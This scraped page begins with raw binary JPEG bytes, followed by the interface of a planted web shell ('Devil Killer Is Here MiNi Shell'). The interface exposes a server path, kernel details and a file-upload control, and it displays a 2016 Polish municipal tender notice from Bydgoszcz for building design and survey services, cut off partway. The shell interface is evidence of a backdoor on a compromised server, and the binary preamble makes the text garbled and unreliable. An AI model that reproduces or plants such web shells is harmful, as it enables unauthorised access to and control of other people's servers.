JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160705/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160705/118493-N-2016.html

<p class="kh_header"><b>Bydgoszcz: 100/P/2016</b><br>
<b>Numer ogłoszenia: 118493 - 2016; data zamieszczenia: 05.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Domów Miejskich "ADM" Spółka z o.o. , ul. Śniadeckich 1, 85-011 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 3481600, faks 052 3481607.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.adm.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego - pełnomocnik Zamawiajacego Miasto Bydgoszcz.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 100/P/2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowo-kosztorysowej dla budynków przy                      ul. Wyszyńskiego 46 i Kaszubska 15  oraz  inwentaryzacji budowlanej  i ekspertyzy  stanu technicznego dla budynku Bydgoska 44
Termin wykonania zamówienia. 
* zapisy dla zadania nr 1 i nr 2:
1) termin wykonania i dostarczenia Zamawiającemu dokumentacji projektowo-kosztorysowej zgodnie z ofertą wykonawcy,  jednak nie później niż  60 dni  od  daty podpisania umowy przez wykonawcę
2) termin uzyskania przez Wykonawcę i dostarczenia Zamawiającemu decyzji pozwolenia na wykonanie robót objętych dokumentacją projektową 90 dni od upływu terminu wyznaczonego na wykonanie dokumentacji projektowo-kosztorysowej, o którym mowa w pkt.1.
* zapisy dla zadania nr 3:
1) termin opracowania inwentaryzacji budowlanej dla wszystkich obiektów na nieruchomości przy ul. Bydgoskiej 44 :  60 dni  od daty podpisania umowy przez Wykonawcę. 
2) termin opracowania ekspertyzy stanu technicznego  dla wszystkich obiektów na nieruchomości przy ul. Bydgoskiej 44 :  80 dni  od daty podpisania umowy przez Wykonawcę.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania wiedzy i doświadczenia zostanie spełniony jeśli Wykonawca wykaże, iż w okresie ostatnich 3 lat przed  dniem wszczęcia  postępowania  o udzielenie  zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - zrealizował należycie zamówienia odpowiadające swoim rodzajem usługom stanowiącym przedmiot niniejszego zamówienia tj. wykonał:
warunek dla zadania nr 1 i nr 2:
*  projekt  budowlany  dotyczący budowy obiektu budowlanego 
lub 
* projekt budowlany dotyczący przebudowy/rozbudowy/modernizacji istniejącego obiektu budowlanego   (np. termomodernizacja budynku, remont elewacji budynku,  rozbudowa/przebudowa budynku)
warunek dla zadania nr 3
* ekspertyzę budowlaną  stanu technicznego budynku mieszkalnego lub innego obiektu budowlanego
* inwentaryzację budowlaną  budynku mieszkalnego  lub innego obiektu budowlanego</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia zostanie spełniony jeżeli Wykonawca wykaże, że dysponuje minimum:
warunek dla zadania nr 1 i nr 2:
1) osobą posiadającą uprawnienia budowlane do projektowania w specjalności konstrukcyjno-budowlanej  zgodnie  z ustawą  z dnia 7 lipca  1994 Prawo budowlane  (Dz. U. 2013r., poz. 1409 ze zm.) lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów prawa, posiadającą aktualne zaświadczenie o wpisie na listę członków właściwej Izby Inżynierów Budownictwa
2) osobą  posiadającą wiedzę i doświadczenie niezbędne do opracowania ekspertyzy ornitologicznej i chiropterologicznej  
3)  osobą posiadającą wiedzę i doświadczenie niezbędne do pełnienia funkcji audytora energetycznego
warunek dla zadania nr 3:
*osobą posiadającą uprawnienia budowlane do projektowania w specjalności architektonicznej  zgodnie  z ustawą  z dnia 7 lipca  1994 Prawo budowlane  (Dz. U. 2013r., poz. 1409 ze zm.) lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów prawa, posiadającą aktualne zaświadczenie o wpisie na listę członków właściwej Izby Inżynierów Budownictwa 
*osobą posiadającą uprawnienia budowlane do projektowania w specjalności konstrukcyjno-budowlanej  zgodnie  z ustawą  z dnia 7 lipca  1994 Prawo budowlane  (Dz. U. 2013r., poz. 1409 ze zm.) lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów prawa, posiadającą aktualne zaświadczenie o wpisie na listę członków właściwej Izby Inżynierów Budownictwa 
* osobą posiadającą tytuł rzeczoznawcy budowlanego z uprawnieniami konstrukcyjno-budowlanymi wpisaną na listę rzeczoznawców budowlanych prowadzoną przez Izbę Inżynierów Budownictwa 
UWAGA:
W przypadku wykonawców zagranicznych dopuszcza się kwalifikacje równoważne do ww. zdobyte w innych państwach,  na zasadach określonych w art.12a ustawy z dnia 7 lipca 1994 r.  Prawo budowlane (tekst jednolity z 2013 r., poz. 1409 z późniejszymi zmianami).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>warunek dla zadania nr 1 i nr 2:
*  projekt  budowlany  dotyczący budowy obiektu budowlanego 
lub 
* projekt budowlany dotyczący przebudowy/rozbudowy/modernizacji istniejącego obiektu budowlanego (np. termomodernizacja budynku, remont elewacji budynku,  rozbudowa/przebudowa budynku)
warunek dla zadania nr 3
* ekspertyzę budowlaną  stanu technicznego budynku mieszkalnego lub innego obiektu budowlanego
* inwentaryzację budowlaną  budynku mieszkalnego  lub innego obiektu budowlanego;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto wykonawca  zobowiązany jest złożyć wraz z OFERTĄ następujące  dokumenty :
1. w przypadku jeżeli Wykonawca w celu wykazania spełniania warunków udziału w postępowaniu polega na zasobach innych podmiotów - pisemne zobowiązanie (oświadczenie) innych podmiotów do oddania do dyspozycji zasobów niezbędnych do realizacji zamówienia, na okres korzystania z nich przy wykonaniu zamówienia (złożone w  oryginale).
Powyższe zobowiązanie winno wyrażać w sposób wyraźny i jednoznaczny wolę udzielenia Wykonawcy ubiegającemu się o zamówienie odpowiedniego zasobu - wskazywać jego rodzaj, czas udzielenia, a także inne istotne okoliczności, w tym wynikające ze specyfiki tego zasobu.  W sytuacji, gdy przedmiotem udzielenia są zasoby nierozerwalnie związane z podmiotem ich udzielającym, niemożliwe do samodzielnego obrotu i dalszego udzielenia ich bez zaangażowania tego podmiotu w wykonanie zamówienia (tj. wiedza i doświadczenie, potencjał osobowy)- taki dokument powinien zawierać wyraźne nawiązanie do uczestnictwa tego podmiotu w wykonaniu zamówienia. 
2.  w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia - pełnomocnictwo o którym mowa w pkt.7.5. ust.1) niniejszej SIWZ (złożone w oryginale lub notarialnie poświadczonej za zgodność z oryginałem kopii )
3. w przypadku składania oferty przez pełnomocnika Wykonawcy - pełnomocnictwo do reprezentowania wykonawcy przez Pełnomocnika (w oryginale lub notarialnie poświadczonej za zgodność z oryginałem kopii)
5.  Podmioty wspólnie ubiegające się o udzielenie zamówienia:
- zgodnie z art.23 uPzp Zamawiający dopuszcza możliwość składania jednej oferty przez dwa lub więcej podmioty/ów jednak pod warunkiem, że taka oferta spełniać będzie następujące wymagania:
1) wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego zobowiązani są ustanowić pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i do zawarcia umowy - wówczas do oferty należy dołączyć pełnomocnictwo, z którego wynikać będzie zakres umocowania.
2) każdy z wykonawców musi oddzielnie udokumentować - przedkładając dokumenty, o których mowa w pkt.7.2. SIWZ, że nie podlega wykluczeniu na podstawie  art.24 ust.1. ustawy Pzp oraz  złożyć listę kapitałową  albo informację  o tym, że nie należy do grupy kapitałowej,o której mowa w pkt.7.3. SIWZ
3) wykonawcy wspólnie ubiegający się o udzielenie zamówienia winni łącznie spełniać warunki udziału w postępowaniu, o których mowa w art.22 ust.1 ustawy Pzp, a określone przez Zamawiającego w  pkt.6.2. SIWZ
4) oferta musi być podpisana w taki sposób, aby prawnie zobowiązywała wszystkich wykonawców występujących wspólnie,
5) jeżeli oferta wykonawców wspólnie ubiegających się o zamówienie zostanie wybrana jako najkorzystniejsza, Zamawiający przed zawarciem umowy może zażądać przedłożenia umowy regulującej współpracę wykonawców.
6. Formularz oferty zgodnie ze  wzorem stanowiącym załącznik nr 1 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin wykonania  dokumentacji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.adm.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Administracja Domów Miejskich  ADM Sp. z o.o.  Dział Zamówień Publicznych , 85-005 Bydgoszcz , ul. Gdańska  9 ( 2 piętro , pokój nr 2).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.07.2016 godzina 10:00, miejsce: Administracja Domów Miejskich  Dział Zamówień Publicznych  , 85-005 Bydgoszcz , ul. Gdańska 9 ( 2 piętro, pokój nr 2).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 100/P/2016.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1:
obejmuje opracowanie dokumentacji projektowo-kosztorysowej (zwanej dalej dokumentacją) na wykonanie termomodernizacji budynku mieszkalnego przy ul. Wyszyńskiego 46 w Bydgoszczy  oraz uzyskanie  przez  Wykonawcę  decyzji  pozwolenia  na  wykonanie robót  objętych dokumentacją. 
Dokumentacja projektowa winna obejmować m. in. następujący zakres prac:  roboty hydroizolacyjne,docieplenie ścian zewnętrznych (w ramach obrębu działki gminnej nr 45/2), remont dachu, wymianę  obróbek blacharskich, wymianę lub renowację stolarki okiennej i drzwiowej zewnętrznej, pozostałe robot budowlane (naprawy, wzmocnienia). 
UWAGA: W przypadku braku zgody Miejskiego Konserwatora Zabytków na ocieplenie przegród budowlanych (pionowych i poziomych) od zewnątrz - należy zaprojektować docieplenie od wewnątrz i uwzględnić remont elewacji wraz z kolorystyką. 
Szczegółowy zakres zamówienia obejmuje: 
1) uzyskanie przez Wykonawcę we własnym zakresie, w ramach wynagrodzenie ofertowego (na podstawie przygotowanego przez Wykonawcę pełnomocnictwa Zamawiającego) i zebranie wszystkich niezbędnych uzgodnień, pozwoleń, decyzji, map geodezyjnych,  opinii (w tym miejskiego Konserwatora Zabytków) i  innych dokumentów - niezbędnych do opracowania dokumentacji projektowej i uzyskania przez wykonawcę decyzji pozwolenia na wykonanie robót budowlanych
2) opracowanie audytu energetycznego określającego zakres, parametry techniczne i ekonomiczne przedsięwzięcia termomodernizacyjnego, ze wskazaniem rozwiązania optymalnego z punktu widzenia kosztów realizacji tego przedsięwzięcia
3)  opracowanie charakterystyki energetycznej budynku 
4)  opracowanie ekspertyzy ornitologicznej i  chiropterologicznej
5) wykonanie dokumentacji projektowej termomodernizacji budynku - zgodnie z zaleceniami audytu energetycznego, opinii konserwatorskiej, ekspertyz ornitologicznej i chiropterologicznej - uwzględniającej wszystkie roboty towarzyszące, zawierającej wymagane opinie, uzgodnienia, pozwolenia i inne dokumenty wymagane przepisami szczegółowymi. 
Projekt budowlany winien być opracowany w ilości 5 egzemplarzy (w wersji papierowej) i zawierać:
a)  warunki BIOZ, wytyczne BHP i  p. poż. 
b) szczegółowy kosztorys inwestorski, z podziałem na poszczególne rodzaje robót (zadania): wersja papierowa - 3 egz., na nośniku elektronicznym - płyta  CD/DVD, 1 egz., 
UWAGA: szczegółowy podział kosztorysu inwestorskiego na poszczególne zadania (rodzaje robót) wykonawca winien uzgodnić z Zamawiającym (inspektorem nadzoru ADM) - jeszcze przez przystąpieniem do realizacji zamówienia.
c) szczegółowy przedmiar robót, z podziałem na poszczególne rodzaje robót (zadania) tak jak kosztorys  inwestorski: wersja papierowa - 3 egz., na nośniku elektronicznym - płyta  CD/DVD, 1 egz., 
d) szczegółową specyfikację techniczną wykonania i odbioru robót: wersja papierowa - 2 egz., na nośniku elektronicznym - płyta  CD/DVD, 1 egz., 
6)  uzyskanie (na podstawie przygotowanego przez Wykonawcę pełnomocnictwa Zamawiającego) decyzji pozwolenia na wykonanie robót objętych projektem. Wniosek należy złożyć do Wydziału Administracji Budowlanej Urzędu Miasta Bydgoszczy (wzór wniosku oraz karta usługi wydawania decyzji udzielającej pozwolenia na wykonanie robót jest na stronie UM Bydgoszcz, Wydział Administracji Budowlanej, Referat Architektury).
Pozostałe  warunki  realizacji  zamówienia:
1) Zamawiający przekaże Wykonawcy, wybranemu do realizacji zamówienia - stosowne pełnomocnictwo (na pisemne żądanie) - w celu uzyskania przez niego niezbędnych opinii (w tym Miejskiego Konserwatora Zabytków), uzgodnień, koniecznych do opracowania dokumentacji projektowej oraz uzyskania przez              niego decyzji zatwierdzającej dokumentację projektową i udzielającej pozwolenia na wykonanie robót budowlanych. 
2) rozliczenie wynagrodzenia wykonawcy nastąpi jedną fakturą/rachunkiem, po wykonaniu całego świadczenia, obejmującego opracowanie dokumentacji projektowo-kosztorysowej oraz uzyskanie decyzji pozwolenia na wykonanie robót budowlanych objętych projektem.
3) cała dokumentacja winna być przekazana Zamawiającemu również w formie elektronicznej, zapisanej na nośniku płyta CD/DVD w ilości 1 szt. -  z tym, że do odczytu - z rozszerzeniem PDF; do edycji - pliki rysunków w formacie dxf lub dwg, a kosztorys inwestorski i przedmiar robót winien być sporządzony                             w  programie Norma Pro wersja 4.43. (pliki w rozszerzeniu pdf i ath)
4) każdy egzemplarz dokumentacji winien być trwale oprawiony, w sposób uniemożliwiający jego zdekompletowanie. Wykonawca zobowiązany jest przekazać Zamawiającemu dodatkowe egzemplarze dokumentacji (ponad wymaganą liczbę), jeżeli zażąda tego Zamawiający, przy czym Wykonawca ma wówczas prawo żądać zwrotu uzasadnionych kosztów powielenia.
Termin wykonania zamówienia :
1) termin wykonania i dostarczenia Zamawiającemu dokumentacji projektowo-kosztorysowej zgodnie z ofertą wykonawcy,  jednak nie później niż  60 dni  od  daty podpisania umowy przez wykonawcę
2) termin uzyskania przez Wykonawcę i dostarczenia Zamawiającemu decyzji pozwolenia na wykonanie robót objętych dokumentacją projektową 90 dni od upływu terminu wyznaczonego na wykonanie dokumentacji projektowo-kosztorysowej, o którym mowa w pkt.1..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin wykonania  dokumentacji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 100/P/2016.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> obejmuje opracowanie dokumentacji projektowo-kosztorysowej (zwanej dalej dokumentacją)  na wykonanie termomodernizacji budynku mieszkalnego przy ul. Kaszubska 15 w Bydgoszczy oraz  uzyskanie przez Wykonawcę decyzji pozwolenia na wykonanie robót  objętych dokumentacją. 
Dokumentacja projektowa winna obejmować m. in. następujący zakres prac:  roboty hydroizolacyjne,                docieplenie ścian zewnętrznych (w ramach obrębu działki gminnej nr 88), remont dachu, wymianę             obróbek blacharskich, wymianę lub renowację stolarki okiennej i drzwiowej zewnętrznej, pozostałe robot budowlane (naprawy, wzmocnienia). 
UWAGA: W przypadku braku zgody Miejskiego Konserwatora Zabytków na ocieplenie przegród budowlanych (pionowych i poziomych) od zewnątrz - należy zaprojektować docieplenie od wewnątrz i uwzględnić remont elewacji wraz z kolorystyką. 
Szczegółowy zakres zamówienia obejmuje :
1) uzyskanie przez Wykonawcę we własnym zakresie, w ramach wynagrodzenie ofertowego (na podstawie przygotowanego przez Wykonawcę pełnomocnictwa Zamawiającego) i zebranie wszystkich niezbędnych uzgodnień, pozwoleń, decyzji, map geodezyjnych,  opinii (w tym miejskiego Konserwatora Zabytków) i innych dokumentów - niezbędnych do opracowania dokumentacji projektowej i uzyskania przez wykonawcę decyzji pozwolenia na wykonanie robót budowlanych
2) opracowanie audytu energetycznego określającego zakres, parametry techniczne i ekonomiczne  przedsięwzięcia termomodernizacyjnego, ze wskazaniem rozwiązania optymalnego z punktu widzenia kosztów realizacji tego przedsięwzięcia
3)  opracowanie charakterystyki energetycznej budynku 
4)  opracowanie ekspertyzy ornitologicznej i  chiropterologicznej
5) wykonanie dokumentacji projektowej termomodernizacji budynku - zgodnie z zaleceniami audytu energetycznego, opinii konserwatorskiej, ekspertyz ornitologicznej i chiropterologicznej - uwzględniającej wszystkie roboty towarzyszące, zawierającej wymagane opinie, uzgodnienia, pozwolenia i inne dokumenty wymagane przepisami szczegółowymi. 
Projekt budowlany winien być opracowany w ilości 5 egzemplarzy (w wersji papierowej) i zawierać:
a)  warunki BIOZ, wytyczne BHP i  p. poż. 
b) szczegółowy kosztorys inwestorski, z podziałem na poszczególne rodzaje robót (zadania): wersja papierowa - 3 egz., na nośniku elektronicznym - płyta  CD/DVD, 1 egz., 
UWAGA: szczegółowy podział kosztorysu inwestorskiego na poszczególne zadania (rodzaje robót) wykonawca winien uzgodnić z Zamawiającym (inspektorem nadzoru ADM) - jeszcze przez przystąpieniem do realizacji zamówienia.
c) szczegółowy przedmiar robót, z podziałem na poszczególne rodzaje robót (zadania) tak jak kosztorys inwestorski: wersja papierowa - 3 egz., na nośniku elektronicznym - płyta  CD/DVD, 1 egz., 
